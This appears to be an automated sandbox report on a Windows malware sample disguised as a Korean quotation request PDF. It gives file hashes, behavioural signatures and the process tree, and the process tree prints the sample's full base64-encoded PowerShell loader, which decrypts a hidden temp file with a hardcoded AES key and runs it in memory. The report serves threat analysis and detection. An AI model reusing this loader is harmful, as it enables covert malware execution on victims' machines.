Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
18/05/2024, 18:35
Static task
static1
Behavioral task
behavioral1
Sample
견적 의뢰 New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe
Resource
win7-20240220-en
General
-
Target
견적 의뢰 New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe
-
Size
1.0MB
-
MD5
707ff5d813d814fa2989bd8a4664258f
-
SHA1
393439231f83ecbe9aa6a81e74b460e7b7f217a5
-
SHA256
75c221ba937ac5b43e8e44d0e5e311bf7ad7105df44a7b09e073a224e9a7c3a3
-
SHA512
34565d6f74de5f97045afe56aa1d612dc11f02b374a37ae769439984c0a04ecfd748813c081445336d63eaca3eba9a9250d618cdc7b0fa153612faf1187ab3e8
-
SSDEEP
24576:8RUNoVV7+21VERgf/UWgQwoM4tKFMkzl/5A9:8Wqr7++SWf/UW3wNrFzzla9
Malware Config
Signatures
-
pid Process 2656 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2656 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2464 wrote to memory of 2656 2464 견적 의뢰 New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe 29 PID 2464 wrote to memory of 2656 2464 견적 의뢰 New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe 29 PID 2464 wrote to memory of 2656 2464 견적 의뢰 New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\견적 의뢰 New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe"C:\Users\Admin\AppData\Local\Temp\견적 의뢰 New Po -7HY00589 RFQ-0424-135 05 -24 pdf.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADcARAAsACAAMAB4ADkANQAsACAAMAB4ADUAQQAsACAAMAB4ADMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARgAsACAAMAB4ADIAMQAsACAAMAB4ADkAQwAsACAAMAB4ADEAQwAsACAAMAB4AEYANQAsACAAMAB4ADcARQAsACAAMAB4AEEAMwAsACAAMAB4AEYANAAsACAAMAB4ADQARgAsACAAMAB4ADYAOAAsACAAMAB4AEYAMQAsACAAMAB4ADkANgAsACAAMAB4ADkAMQAsACAAMAB4AEEARAAsACAAMAB4AEUARgAsACAAMAB4AEMAMgAsACAAMAB4AEMAOAAsACAAMAB4AEUAMwAsACAAMAB4AEEANwAsACAAMAB4ADcAQgAsACAAMAB4ADgAMQAsACAAMAB4AEYAQgAsACAAMAB4ADIAOQAsACAAMAB4AEQAOAAsACAAMAB4AEQANAAsACAAMAB4ADMAMAAsACAAMAB4ADIAMAApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAyADYALAAgADAAeAAzAEEALAAgADAAeAA0AEIALAAgADAAeAA0ADEALAAgADAAeABGADUALAAgADAAeABGADkALAAgADAAeABEADgALAAgADAAeABDADUALAAgADAAeAA5AEUALAAgADAAeAA4ADEALAAgADAAeAA1AEYALAAgADAAeABEAEEALAAgADAAeAA1ADQALAAgADAAeAA2ADgALAAgADAAeABFADQALAAgADAAeABBADEAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD5c1b8f3a7fc5ee0d440c0d8e2007e5951
SHA12387f4cf70f0006f1b53464cd255076607c626a7
SHA2561a94e878b6ade60c90adb0c4eeaa20ea887fbf58d4bb5ea578e488c1ddaf25cc
SHA512dfb37a6bbd75c7460e1df5de0e2c5b1e928c563344245f78e988174186518255ae7ec32bf77742b313e468687dcea57ef5bcd3ad80347826a42ba837c61acc16